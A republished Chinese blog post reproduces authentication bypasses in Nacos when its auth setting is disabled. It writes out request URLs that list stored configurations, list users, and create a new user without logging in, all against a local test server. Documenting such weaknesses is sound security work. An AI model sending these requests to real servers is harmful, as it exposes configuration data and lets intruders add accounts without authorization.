资讯 小学 初中 高中 语言 会计职称 学历提升 法考 计算机考试 医护考试 建工考试 教育百科
栏目分类:
子分类:
返回
空麓网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
空麓网 > 计算机考试 > 软件开发 > 后端开发 > Java

nacos权限认证(一) 问题复现

Java 更新时间: 发布时间: 计算机考试归档 最新发布

nacos权限认证(一) 问题复现

如果nacos没有开启权限认证,即如下属性设置为false。

nacos.core.auth.enabled = false

在这种情况下,通过一些请求就可以绕过nacos的权限认证。我找到了下述三种方式。

一、/nacos/v1/cs/configs

我们在浏览器中直接拼接 /nacos/v1/cs/configs请求,如下所示。

http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=&username=

浏览器虽然会直接跳到登录页面,但是通过F12 却可以看到返回了配置列表。

 二、GET请求 /nacos/v1/auth/users

在未登录的情况下,通过postman以get方式访问该请求,能拿到用户信息。

http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9

  三、POST请求 /nacos/v1/auth/users

在未登录的情况下,通过postman以post方式访问该请求,传入指定参数,可以直接新增用户。

http://127.0.0.1:8848/nacos/v1/auth/users?username=test2&password=test2

测试登录情况也正常。

如果你还知道其他问题,欢迎补充或更正。 

转载请注明:文章转载自 http://www.konglu.com/
本文地址:http://www.konglu.com/it/939073.html
免责声明:

我们致力于保护作者版权,注重分享,被刊用文章【nacos权限认证(一) 问题复现】因无法核实真实出处,未能及时与作者取得联系,或有版权异议的,请联系管理员,我们会立即处理,本文部分文字与图片资源来自于网络,转载此文是出于传递更多信息之目的,若有来源标注错误或侵犯了您的合法权益,请立即通知我们,情况属实,我们会第一时间予以删除,并同时向您表示歉意,谢谢!

我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2023 成都空麓科技有限公司

ICP备案号:蜀ICP备2023000828号-2